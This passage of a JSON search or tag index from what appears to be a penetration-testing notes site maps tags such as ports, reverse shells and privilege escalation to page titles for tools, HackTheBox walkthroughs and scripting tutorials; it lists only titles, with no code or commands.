                                            ","tags":["tags"]},{"location":"tags/#oracle-tns","title":"oracle tns","text":"
                                            • 1521 - Oracle Transparent Network Substrate (TNS)
                                            • sqlplus - To connect and manage the Oracle RDBMS
                                            ","tags":["tags"]},{"location":"tags/#osint","title":"osint","text":"
                                            • Github dorks
                                            • Google dorks
                                            ","tags":["tags"]},{"location":"tags/#package-manager","title":"package manager","text":"
                                            • pip
                                            ","tags":["tags"]},{"location":"tags/#pass-the-hash-attack","title":"pass the hash attack","text":"
                                            • Invoke-TheHash
                                            • mimikatz
                                            ","tags":["tags"]},{"location":"tags/#pass-the-hash","title":"pass-the-hash","text":"
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#passive-reconnaissance","title":"passive reconnaissance","text":"
                                            • p0f
                                            ","tags":["tags"]},{"location":"tags/#passiverecon","title":"passiverecon","text":"
• HTTrack - A tool for mirroring sites
                                            • nmap - A network exploration and security auditing tool
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            ","tags":["tags"]},{"location":"tags/#password-cracker","title":"password cracker","text":"
• ophcrack - A Windows password cracker based on rainbow tables
                                            ","tags":["tags"]},{"location":"tags/#passwords","title":"passwords","text":"
                                            • CrackMapExec
                                            • hydra
                                            • Invoke-TheHash
                                            • Lazagne
                                            • medusa
                                            • mimikatz
                                            • pypykatz
                                            ","tags":["tags"]},{"location":"tags/#payloads","title":"payloads","text":"
                                            • darkarmour
                                            • mythic
                                            • nishang
                                            • Creating malware and custom payloads
                                            ","tags":["tags"]},{"location":"tags/#pentest","title":"pentest","text":"
                                            • Information gathering
                                            ","tags":["tags"]},{"location":"tags/#pentesting","title":"pentesting","text":"
                                            • Welcome to Hacking Life!
                                            • 22 ssh
                                            • 3128 squid
                                            • Port 53 - Domain Name Server (DNS)
                                            • 69 - tftp
• Aquatone - Automate web scanning across large subdomain lists
                                            • Bind Shells
                                            • Pentesting browsers
                                            • Configuration files
                                            • Cron jobs - path, wildcards, file overwrite.
                                            • curl
                                            • dig axfr
                                            • dirb - A web content enumeration tool
                                            • Dirty COW (Copy On Write)
                                            • django pentesting
                                            • dnscan - A DNS subdomain scanner
                                            • dnsenum - A tool to enumerate DNS
• dnSpy - A .NET decompiler for Windows
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • eJPT - eLearnSecurity Junior Penetration Tester
• exiftool - A tool for metadata editing
                                            • EyeWitness
• feroxbuster - A web content enumeration tool for unreferenced resources
                                            • ffuf - A fast web fuzzer written in Go
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • Gopherus
                                            • grep
                                            • Hashcat - A password recovery tool
                                            • httprint - A web server fingerprinting tool
                                            • hydra
                                            • ntlmrelayx - a module from Impacket
                                            • PsExec - a module from Impacket
                                            • SMBExec - a module from Impacket
                                            • Impacket - A python tool for network protocols
                                            • IPMItool
                                            • JAWS - Just Another Windows (Enum) Script
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            • Kernel vulnerability exploitation
                                            • knockpy - A subdomain scanner
                                            • Lateral movements
                                            • Laudanum - Injectable Web Exploit Code
                                            • Lazagne
                                            • LinEnum - A tool to scan Linux system
                                            • linPEAS - A tool to scan Linux system
                                            • Linux exploit suggester
                                            • Linux Privilege Checker
• LOLBins - Living off the land binaries - LOLBAS and GTFOBins
                                            • M365 CLI
                                            • medusa
                                            • metasploit
                                            • moodlescan
                                            • msfvenom
                                            • Pentesting MyBB
                                            • netcraft
• netdiscover - A network enumeration tool based on ARP requests
                                            • Network traffic capture tools
                                            • noip
                                            • nslookup
• Pentesting OData
• ophcrack - A Windows password cracker based on rainbow tables
                                            • Pentesting Notes
• pyftpdlib - An FTP server written in python
                                            • pyinstaller
                                            • Reverse Shells
                                            • Samba Suite
                                            • searchsploit
                                            • Seatbelt - A tool to scan Windows system
                                            • Spawn a shell
                                            • SQLi Cheat sheet for manual injection
                                            • sqlmap - A tool for testing SQL injection
                                            • SSH keys
                                            • sslyze - A tool for scanning certificates
                                            • sublist3r - A subdomain enumerating tool
                                            • Suid Binaries
                                            • tcpdump - A command-line packet analyzer
• The Harvester - A tool for passive and active reconnaissance
                                            • Tmux - A terminal multiplexer
                                            • veil - A backdoor generator
                                            • Vulnerability assessment
                                            • Vulnhub Raven 1
                                            • Vulnhub Raven 2
                                            • w3af
                                            • WafW00f - A firewall scanner
                                            • waybackurls
                                            • Pentesting web services
                                            • Web Shells
• WebDAV - WsgiDAV - A generic and extendable WebDAV server
                                            • Weevely - A PHP webshell backdoor generator
                                            • wfuzz
                                            • whatweb - A web scanner
                                            • Window Detective - A tool to view windows properties in the system
                                            • Windows binaries - LOLBAS
                                            • winspy - A tool to view windows properties in the system
                                            • pentesting wordpress
                                            • wpscan - Wordpress Security Scanner
                                            • xsltproc
                                            • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                                            • OWASP Web Security Testing Guide
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            • Mifare Classic
                                            • Mifare Desfire
                                            • NFC - Setting up proxmark3 RDV4.01
                                            • Proxmark3 RDV4.01
                                            • RFID
                                            • Web Exploitation Guide
                                            • Arbitrary file upload
                                            • CSRF attack - Cross Site Request Forgery
                                            • Directory Traversal attack
                                            • Insecure deserialization
                                            • Json Web Token attacks
                                            • LFI attack - Local File Inclusion
                                            • NoSQL injection
                                            • RFD attack - Reflected File Download
                                            • RCE attack - Remote Code Execution
                                            • RFI attack - Remote File Inclusion
                                            • SSRF attack - Server Side Request Forgery
                                            • Server-side Template Injection - SSTI
                                            • Session Puzzling - Session Variable Overloading
                                            • SQL injection
                                            ","tags":["tags"]},{"location":"tags/#pentesting-http-headers","title":"pentesting HTTP headers","text":"
                                            • HTTP headers
                                            ","tags":["tags"]},{"location":"tags/#pentesting-cloud","title":"pentesting cloud","text":"
                                            • Pentesting Amazon Web Services (AWS)
                                            • Pentesting Azure
                                            ","tags":["tags"]},{"location":"tags/#pentesting-windows","title":"pentesting windows","text":"
                                            • SAMRDump
                                            • smbserver - from impacket
                                            • Windows Null session attack
                                            • Winfo
                                            ","tags":["tags"]},{"location":"tags/#pentestingc","title":"pentesting\u00e7","text":"
                                            • Weevely - A PHP webshell backdoor generator
                                            ","tags":["tags"]},{"location":"tags/#persistence","title":"persistence","text":"
                                            • Making your binary persistent
                                            ","tags":["tags"]},{"location":"tags/#phishing","title":"phishing","text":"
                                            • BeEF - The browser exploitation framework project
                                            • Tools for cloning a site
                                            ","tags":["tags"]},{"location":"tags/#php","title":"php","text":"
• pentestmonkey php reverse shell
                                            • Phpggc - A tool for PHP deserialization
                                            • WhiteWinterWolf php webshell
                                            ","tags":["tags"]},{"location":"tags/#php-include","title":"php include","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#php-type-juggling","title":"php type juggling","text":"
                                            • Base - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#ping","title":"ping","text":"
                                            • fping - An improved ping tool
• How to resolve run-of-the-mill connection problems
                                            ","tags":["tags"]},{"location":"tags/#pop3","title":"pop3","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port","title":"port","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#port-1090","title":"port 1090","text":"
                                            • 1090 java rmi
                                            ","tags":["tags"]},{"location":"tags/#port-110","title":"port 110","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-111","title":"port 111","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 2049 - NFS Network File System
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#port-137","title":"port 137","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-138","title":"port 138","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-139","title":"port 139","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-143","title":"port 143","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-1433","title":"port 1433","text":"
                                            • 1433 msSQL
                                            ","tags":["tags"]},{"location":"tags/#port-1521","title":"port 1521","text":"
                                            • 1521 - Oracle Transparent Network Substrate (TNS)
                                            • sqlplus - To connect and manage the Oracle RDBMS
                                            ","tags":["tags"]},{"location":"tags/#port-161","title":"port 161","text":"
                                            • 161-162 SNMP Simple Network Management Protocol
                                            • braa - SNMP scanner
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • snmpwalk - SNMP scanner
                                            ","tags":["tags"]},{"location":"tags/#port-162","title":"port 162","text":"
                                            • 1521 - Oracle Transparent Network Substrate (TNS)
                                            • 161-162 SNMP Simple Network Management Protocol
                                            ","tags":["tags"]},{"location":"tags/#port-20","title":"port 20","text":"
                                            • 21 ftp
                                            ","tags":["tags"]},{"location":"tags/#port-2049","title":"port 2049","text":"
                                            • Port 2049 - NFS Network File System
                                            ","tags":["tags"]},{"location":"tags/#port-21","title":"port 21","text":"
                                            • 21 ftp
                                            ","tags":["tags"]},{"location":"tags/#port-22","title":"port 22","text":"
                                            • 22 ssh
                                            ","tags":["tags"]},{"location":"tags/#port-23","title":"port 23","text":"
                                            • 23 telnet
                                            ","tags":["tags"]},{"location":"tags/#port-25","title":"port 25","text":"
• Ports 25, 465, 587 - Simple Mail Transfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#port-27017","title":"port 27017","text":"
                                            • 27017-27018 mongodb
• Walkthrough - A HackTheBox machine - Mongod
                                            ","tags":["tags"]},{"location":"tags/#port-27018","title":"port 27018","text":"
                                            • 27017-27018 mongodb
                                            ","tags":["tags"]},{"location":"tags/#port-3128","title":"port 3128","text":"
                                            • 3128 squid
                                            ","tags":["tags"]},{"location":"tags/#port-3306","title":"port 3306","text":"
                                            • 3306 mariadb mysql
                                            • Sequel - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#port-3389","title":"port 3389","text":"
                                            • 3389 RDP
                                            ","tags":["tags"]},{"location":"tags/#port-445","title":"port 445","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • Tactics - A HackTheBox machine
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-465","title":"port 465","text":"
• Ports 25, 465, 587 - Simple Mail Transfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#port-5432","title":"port 5432","text":"
                                            • 5432 postgresql
                                            ","tags":["tags"]},{"location":"tags/#port-55007","title":"port 55007","text":"
                                            • 55006-55007 Dovecot pop3
                                            ","tags":["tags"]},{"location":"tags/#port-55008","title":"port 55008","text":"
                                            • 55006-55007 Dovecot pop3
                                            ","tags":["tags"]},{"location":"tags/#port-587","title":"port 587","text":"
• Ports 25, 465, 587 - Simple Mail Transfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#port-5985","title":"port 5985","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            ","tags":["tags"]},{"location":"tags/#port-5986","title":"port 5986","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            ","tags":["tags"]},{"location":"tags/#port-623","title":"port 623","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            • IPMItool
                                            ","tags":["tags"]},{"location":"tags/#port-6379","title":"port 6379","text":"
                                            • 6379 redis
                                            ","tags":["tags"]},{"location":"tags/#port-6653","title":"port 6653","text":"
                                            • 6653 Openflow
                                            ","tags":["tags"]},{"location":"tags/#port-69","title":"port 69","text":"
                                            • Walkthrough - Included - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#port-8080","title":"port 8080","text":"
                                            • 8080 JBoss AS Instance 6.1.0
                                            ","tags":["tags"]},{"location":"tags/#port-873","title":"port 873","text":"
                                            • 873 rsync
                                            ","tags":["tags"]},{"location":"tags/#port-993","title":"port 993","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-995","title":"port 995","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-scanner","title":"port scanner","text":"
                                            • Coding a reverse shell that scans ports
                                            ","tags":["tags"]},{"location":"tags/#ports","title":"ports","text":"
                                            • Well-known ports
                                            ","tags":["tags"]},{"location":"tags/#post-exploitation","title":"post exploitation","text":"
                                            • Empire
                                            ","tags":["tags"]},{"location":"tags/#postgresql","title":"postgresql","text":"
                                            • 5432 postgresql
                                            • Walkthrough - A HackTheBox machine - Funnel
                                            ","tags":["tags"]},{"location":"tags/#powershell","title":"powershell","text":"
• Azure PowerShell
                                            ","tags":["tags"]},{"location":"tags/#privilege-escalation","title":"privilege escalation","text":"
                                            • Configuration files
                                            • Create a Registry
                                            • Cron jobs - path, wildcards, file overwrite.
                                            • Walkthrough - Included - A HackTheBox machine
                                            • Index for Linux Privilege Escalation
                                            • Index for Windows Privilege Escalation
                                            • Kernel vulnerability exploitation
                                            • linPEAS - A tool to scan Linux system
                                            • Linux exploit suggester
                                            • Linux Privilege Checker
                                            • lxd
                                            • Pass The Hash
                                            • PowerUp.ps1
                                            • Process capabilities - getcap
                                            • SSH keys
                                            • Suid Binaries
                                            • Windows binaries - LOLBAS
                                            • Recently accessed files and executed commands
                                            • winPEAS - Windows Privilege Escalation Awesome Scripts
                                            • Privilege escalation - Weak service file permission
                                            ","tags":["tags"]},{"location":"tags/#privileges-escalation","title":"privileges escalation","text":"
                                            • Dirty COW (Copy On Write)
                                            ","tags":["tags"]},{"location":"tags/#procesmonitor","title":"procesMonitor","text":"
                                            • Information gathering phase - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#process-hacker-tool","title":"process hacker tool","text":"
• Attacking thick client applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#proxy","title":"proxy","text":"
                                            • 3128 squid
                                            • Burpsuite
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            ","tags":["tags"]},{"location":"tags/#public-cloud","title":"public cloud","text":"
                                            • Amazon Web Services (AWS) Essentials
                                            • Google Cloud Platform Essentials
                                            ","tags":["tags"]},{"location":"tags/#python","title":"python","text":"
                                            • django pentesting
• Immunity Debugger
                                            • noip
                                            • pyftpdlib - A ftp server written in python
                                            • pyinstaller
• Responder.py - An SMB server to listen for NTLM hashes
                                            • Bypassing IPS with handmade XOR Encryption
                                            • Bypassing Next Generation Firewalls
• Coding a data exfiltration script for an http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
• Coding a TCP connection and a reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • DNS poisoning
                                            • Dumping saved passwords from Google Chrome
• Hijack the Internet Explorer process to bypass a host-based firewall
                                            • Hijacking Keepass Password Manager
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • Man in the browser attack
                                            • pip
                                            • Privilege escalation - Weak service file permission
                                            • Installing python
                                            • Simple keylogger in python
                                            • Python tools for pentesting
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
• Tuning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#python-pentesting","title":"python pentesting","text":"
• Immunity Debugger
                                            • Bypassing IPS with handmade XOR Encryption
                                            • Bypassing Next Generation Firewalls
• Coding a data exfiltration script for an http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
• Coding a TCP connection and a reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • DNS poisoning
                                            • Dumping saved passwords from Google Chrome
• Hijack the Internet Explorer process to bypass a host-based firewall
                                            • Hijacking Keepass Password Manager
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • Man in the browser attack
                                            • Privilege escalation - Weak service file permission
                                            • Installing python
                                            • Simple keylogger in python
                                            • Python tools for pentesting
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
• Tuning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#rce","title":"rce","text":"
                                            • SirepRAT - RCE as SYSTEM on Windows IoT Core
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#rdp","title":"rdp","text":"
                                            • 3389 RDP
                                            • rdesktop
                                            • xfreerdp
                                            ","tags":["tags"]},{"location":"tags/#reconnaissance","title":"reconnaissance","text":"
                                            • The ActiveDirectory PowerShell module
                                            • BloodHound
• crt.sh
                                            • dnscan - A DNS subdomain scanner
• feroxbuster - A web content enumeration tool for unreferenced resources
                                            • fping - An improved ping tool
                                            • Github dorks
                                            • Google dorks
                                            • grep
• HTTrack - A tool for mirroring sites
                                            • masscan - An IP scanner
                                            • Nessus
                                            • netcraft
• netdiscover - A network enumeration tool based on ARP requests
                                            • nikto
                                            • nmap - A network exploration and security auditing tool
                                            • OpenVAS
                                            • openVAS Reporting
                                            • p0f
                                            • ping
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            • SharpView
                                            • sublist3r - A subdomain enumerating tool
                                            • tcpdump - A command-line packet analyzer
• The Harvester - A tool for passive and active reconnaissance
                                            • waybackurls
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            • Test Application Platform Configuration - OWASP Web Security Testing Guide
                                            • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                                            • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                                            • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                                            • Test HTTP Methods - OWASP Web Security Testing Guide
                                            • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                                            • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                                            • Test File Permission - OWASP Web Security Testing Guide
                                            • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                                            • Test Cloud Storage - OWASP Web Security Testing Guide
                                            • Testing for Content Security Policy - OWASP Web Security Testing Guide
                                            • Test Path Confusion - OWASP Web Security Testing Guide
                                            • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#redis","title":"redis","text":"
                                            • 6379 redis
                                            • Walkthrough - A HackTheBox machine - Redeemer
                                            ","tags":["tags"]},{"location":"tags/#reflexil","title":"reflexil","text":"
• Reversing and patching thick client applications
                                            ","tags":["tags"]},{"location":"tags/#registry","title":"registry","text":"
                                            • Making your binary persistent
                                            ","tags":["tags"]},{"location":"tags/#regshot","title":"regshot","text":"
• Attacking thick client applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#relational","title":"relational","text":"
                                            • sqlite
                                            • Virtual environments
                                            ","tags":["tags"]},{"location":"tags/#relational-database","title":"relational database","text":"
                                            • MariaDB
                                            • MySQL
                                            ","tags":["tags"]},{"location":"tags/#reporting","title":"reporting","text":"
                                            • openVAS Reporting
                                            • xsltproc
                                            ","tags":["tags"]},{"location":"tags/#resources","title":"resources","text":"
• LOLBins - Living off the land binaries - LOLBAS and GTFOBins
• Repo for legacy operating systems
                                            • Index of downloads
                                            ","tags":["tags"]},{"location":"tags/#responderpy","title":"responder.py","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#reverse-shell","title":"reverse shell","text":"
                                            • Bank - A HackTheBox machine
                                            • Base - A HackTheBox machine
                                            • Nibbles - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
• pentestmonkey php reverse shell
• Coding a data exfiltration script for an http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
• Coding a TCP connection and a reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
• Hijack the Internet Explorer process to bypass a host-based firewall
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
• Tuning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#reverse-shells","title":"reverse-shells","text":"
                                            • Reverse Shells
                                            • Web Shells
                                            ","tags":["tags"]},{"location":"tags/#rpc","title":"rpc","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#rsa","title":"rsa","text":"
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            ","tags":["tags"]},{"location":"tags/#rsync","title":"rsync","text":"
                                            • 873 rsync
                                            ","tags":["tags"]},{"location":"tags/#rules","title":"rules","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            ","tags":["tags"]},{"location":"tags/#rules-of-engagement","title":"rules of engagement","text":"
                                            • Rules of Engagement - Checklist
                                            ","tags":["tags"]},{"location":"tags/#s3","title":"s3","text":"
                                            • AWS cli
                                            ","tags":["tags"]},{"location":"tags/#samba","title":"samba","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#scanner","title":"scanner","text":"
                                            • Nessus
                                            • OpenVAS
                                            • openVAS Reporting
                                            ","tags":["tags"]},{"location":"tags/#scanning","title":"scanning","text":"
                                            • Port 53 - Domain Name Server (DNS)
• crt.sh
                                            • dnscan - A DNS subdomain scanner
                                            • fping - An improved ping tool
                                            • Github dorks
                                            • Google dorks
• HTTrack - A tool for mirroring sites
                                            • masscan - An IP scanner
                                            • nmap - A network exploration and security auditing tool
                                            • p0f
                                            • ping
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            • sublist3r - A subdomain enumerating tool
                                            ","tags":["tags"]},{"location":"tags/#screenshot-capturer","title":"screenshot capturer","text":"
                                            • Making a screenshot
                                            ","tags":["tags"]},{"location":"tags/#scripting","title":"scripting","text":"
                                            • Bypassing IPS with handmade XOR Encryption
                                            • Bypassing Next Generation Firewalls
• Coding a data exfiltration script for an http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
• Coding a TCP connection and a reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • Dumping saved passwords from Google Chrome
• Hijack the Internet Explorer process to bypass a host-based firewall
                                            • Hijacking Keepass Password Manager
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • pip
                                            • Privilege escalation - Weak service file permission
                                            • Installing python
                                            • Simple keylogger in python
                                            • Python tools for pentesting
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
• Tuning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#serialization-vulnerability","title":"serialization vulnerability","text":"
                                            • Log4j
                                            ","tags":["tags"]},{"location":"tags/#server","title":"server","text":"
• Responder.py - An SMB server to listen for NTLM hashes
                                            • smbserver - from impacket
                                            • uploadserver
• WebDAV - WsgiDAV - A generic and extendable WebDAV server
                                            ","tags":["tags"]},{"location":"tags/#server-enumeration","title":"server enumeration","text":"
                                            • httprint - A web server fingerprinting tool
                                            ","tags":["tags"]},{"location":"tags/#servers","title":"servers","text":"
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • Setting up servers
                                            ","tags":["tags"]},{"location":"tags/#services","title":"services","text":"
                                            • Well-known ports
                                            ","tags":["tags"]},{"location":"tags/#sheet","title":"sheet","text":"
                                            • Pentesting Powerapp
                                            ","tags":["tags"]},{"location":"tags/#shells","title":"shells","text":"
                                            • msfvenom
                                            • Spawn a shell
                                            • Tmux - A terminal multiplexer
                                            ","tags":["tags"]},{"location":"tags/#smb","title":"smb","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • Port 2049 - NFS Network File System
                                            • Tactics - A HackTheBox machine
                                            • ntlmrelayx - a module from Impacket
                                            • PsExec - a module from Impacket
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#smb-vulnerability","title":"smb vulnerability","text":"
                                            • Lame - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#snmp_1","title":"snmp","text":"
                                            • braa - SNMP scanner
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • snmpwalk - SNMP scanner
                                            ","tags":["tags"]},{"location":"tags/#soap","title":"soap","text":"
                                            • Pentesting web services
                                            ","tags":["tags"]},{"location":"tags/#sql_1","title":"sql","text":"
                                            • Sequel - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#sql-injection","title":"sql injection","text":"
• Attacking thick client applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#sqli","title":"sqli","text":"
                                            • BurpSuite Labs - SQL injection
                                            ","tags":["tags"]},{"location":"tags/#ssrf","title":"ssrf","text":"
                                            • Gopherus
                                            • BurpSuite Labs - Broken access control vulnerabilities
                                            • BurpSuite Labs - Server Side Request Forgery
                                            ","tags":["tags"]},{"location":"tags/#ssti","title":"ssti","text":"
                                            • BurpSuite Labs - Server Side Template Injection
                                            ","tags":["tags"]},{"location":"tags/#strings","title":"strings","text":"
• Attacking thick client applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#subdomain","title":"subdomain","text":"
• Port 53 - Domain Name System (DNS)
• crt.sh
                                            • dnscan - A DNS subdomain scanner
                                            ","tags":["tags"]},{"location":"tags/#subdomains","title":"subdomains","text":"
• sublist3r - A subdomain enumeration tool
                                            ","tags":["tags"]},{"location":"tags/#suid-binaries","title":"suid binaries","text":"
                                            • Bank - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#suid-binary","title":"suid binary","text":"
                                            • Base - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#tcp","title":"tcp","text":"
                                            • p0f
                                            ","tags":["tags"]},{"location":"tags/#tcp-view","title":"tcp view","text":"
                                            • Information gathering phase - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#techniques","title":"techniques","text":"
                                            • Pentesting Tomcat
                                            • DNS poisoning
                                            • Man in the browser attack
                                            ","tags":["tags"]},{"location":"tags/#telnet","title":"telnet","text":"
                                            • 23 telnet
                                            ","tags":["tags"]},{"location":"tags/#terminal","title":"terminal","text":"
                                            • msfvenom
                                            • Spawn a shell
                                            • Tmux - A terminal multiplexer
                                            ","tags":["tags"]},{"location":"tags/#tftp","title":"tftp","text":"
                                            • 21 ftp
                                            • Walkthrough - Included - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#thick-applications","title":"thick applications","text":"
                                            • CFF explorer
• mitm_relay
                                            • SysInternals Suite
                                            ","tags":["tags"]},{"location":"tags/#thick-client","title":"thick client","text":"
                                            • Window Detective - A tool to view windows properties in the system
                                            • winspy - A tool to view windows properties in the system
                                            ","tags":["tags"]},{"location":"tags/#thick-client-application","title":"thick client application","text":"
                                            • Process Hacker tool
                                            ","tags":["tags"]},{"location":"tags/#thick-client-applications","title":"thick client applications","text":"
                                            • Pentesting Thick client Applications - Introduction
• Attacking thick client applications - Data storage issues
                                            • Basic Lab Setup - Thick client Applications
                                            • Common vulnerabilities
                                            • First challenge - Enabling a button - Thick client Applications
                                            • Information gathering phase - Thick client Applications
• Reversing and patching thick client applications
                                            • Traffic analysis - Thick client Applications
                                            • Thick client Applications Pentesting Checklist
                                            • Tools for pentesting thick client applications
                                            ","tags":["tags"]},{"location":"tags/#thick-client-applications-pentesting","title":"thick client applications pentesting","text":"
                                            • Pentesting Thick client Applications - Introduction
• Attacking thick client applications - Data storage issues
                                            • Basic Lab Setup - Thick client Applications
                                            • Common vulnerabilities
                                            • First challenge - Enabling a button - Thick client Applications
                                            • Information gathering phase - Thick client Applications
• Reversing and patching thick client applications
                                            • Traffic analysis - Thick client Applications
                                            • Thick client Applications Pentesting Checklist
                                            • Tools for pentesting thick client applications
